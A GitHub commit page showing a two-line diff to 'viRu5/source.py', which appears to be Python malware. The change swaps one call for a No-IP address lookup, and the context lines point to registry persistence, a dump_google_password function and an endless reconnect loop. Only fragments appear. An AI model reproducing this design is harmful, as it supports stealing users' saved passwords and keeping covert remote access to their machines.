Skip to content

Commit

Permalink
Update source.py
Browse files Browse the repository at this point in the history
  • Loading branch information
islamTaha12 authored Jul 3, 2016
1 parent de0d9e3 commit 4ac96a7
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions viRu5/source.py
Original file line number Diff line number Diff line change
Expand Up @@ -30,7 +30,7 @@ def set_reg_key_value(REG_PATH, name, value):
def fire():
if NO_IP_HOST:
# Check if no-ip is online or not
check_no_ip_online()
get_noip_ip_address()

if platform.machine().endswith('32'):
try:
Expand Down Expand Up @@ -121,4 +121,4 @@ def dump_google_password():
# keep firing in case of the connection is loss
while True:
run_after_close()
time.sleep(TIME_SLEEP)
time.sleep(TIME_SLEEP)

0 comments on commit 4ac96a7

Please sign in to comment.